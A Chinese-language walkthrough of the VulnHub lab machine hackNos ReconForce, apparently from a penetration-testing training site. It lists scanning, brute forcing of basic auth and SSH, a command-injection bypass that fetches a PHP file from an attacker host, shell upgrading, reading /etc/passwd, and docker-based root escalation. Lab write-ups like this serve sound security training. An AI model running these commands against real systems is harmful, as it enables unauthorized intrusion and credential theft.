[原创] 靶机系列测试 ReconForce
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
1 交流平台
随着教程的推出,看视频的人也越来越多,随之而来的问题也增多,本人平时非常忙,难以有时间回复大家的问题,特意建立了一个QQ群,里面有很多这方面的高手,有什么不懂的,请到群里提问,咨询问题的时候,一定要详细,不然没人会回复你,另外本人有时间会在群内直播测试靶机,还没加上群的赶快加上了。
1 介绍
1.1 靶机介绍
描述 | 说明 |
Difficulty | Easy to Intermediate |
Flag | 2 Flag first user And the second root |
Learning | Web Application | Enumeration | Privilege Escalation |
下载地址
https://www.vulnhub.com/entry/hacknos-reconforce,416/
难度 中等
3靶机测试
3.1信息收集
3.1.1 nmap扫描
nmap -sC -sV 192.168.0.136 -oA ReconForce-port
3.2 目录扫描
gobuster dir -u http://192.168.0.136 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
3.3 访问主页
http://192.168.0.136/5ecure/ 存在基础验证登录
is requesting your username and password. The site says: “Recon Security”
3.4 ftp匿名登录
ftp 192.168.0.136
ftp允许匿名登录 但是目录没有任何内容 但是有登录提示 Secure@hackNos
3.5 python 组合密码
world=[‘Recon’,’Security’,’5ecure’,’Secure’]
for i in world:
print(i+’@hackNos’)
Recon@hackNos
Security@hackNos
5ecure@hackNos
Secure@hackNos
3.5.1 破解基础认证
msfconsole
useauxiliary(scanner/http/http_login
3.6 命令执行漏洞
3.6.1 分析源码
|ls
|cat out.php
过滤众多字符 |id 这样刚好就绕过了。
下载文件
|wget http://192.168.0.118/1.php
3.7 建立交互shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
3.8 测试用户recon密码
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
recon:x:1000:119:rahul:/home/recon:/bin/bash
3.8.1 hydra测试密码
hydra -l recon -P pass.txt ssh://192.168.0.136
3.9 登录recon用户
ssh recon@192.168.0.136
3.10 得到user.txt
3.11 特权提升
3.11.1 方法一
看到目录下有 sudo_as_admin_successful
sudo -l 输入密码 Security@hackNos
看到可以执行任何命令
得到root.txt
3.11.2 方法二
创建容器 shell
docker run -v /:/mnt –rm -it alpine chroot /mnt sh
自动下载 alpine 文件
创建宿主根目录到 mbt目录
docker run -it -v /:/mbt e7d92cdc71fe
cd /mbt
cat root/root.txt
4 学习总结
- nmap扫描
- gobuster目录扫描
- 基础认证破解
- 密码组合
- 命令执行漏洞
- 创建交互式shell
- hydra ssh破解
- 分析源码
- dacker提权
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/963.html